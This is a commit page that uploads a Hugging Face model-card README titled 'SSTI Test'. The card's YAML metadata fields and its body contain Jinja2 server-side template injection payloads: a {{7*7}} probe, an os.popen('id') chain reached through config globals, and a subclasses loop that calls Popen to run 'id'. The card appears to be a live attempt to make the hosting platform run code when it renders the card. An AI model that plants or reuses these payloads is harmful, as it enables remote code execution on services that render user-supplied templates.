Upload README.md with huggingface_hub
Browse files
README.md
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
language: en
|
| 3 |
+
tags:
|
| 4 |
+
- test
|
| 5 |
+
metrics:
|
| 6 |
+
- accuracy: "{{7*7}}"
|
| 7 |
+
- name: "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"
|
| 8 |
+
---
|
| 9 |
+
# SSTI Test
|
| 10 |
+
|
| 11 |
+
{{ 7*7 }}
|
| 12 |
+
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
|
| 13 |
+
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='Popen' %}{{c(['id'],stdout=-1).communicate()[0]}}{% endif %}{% endfor %}
|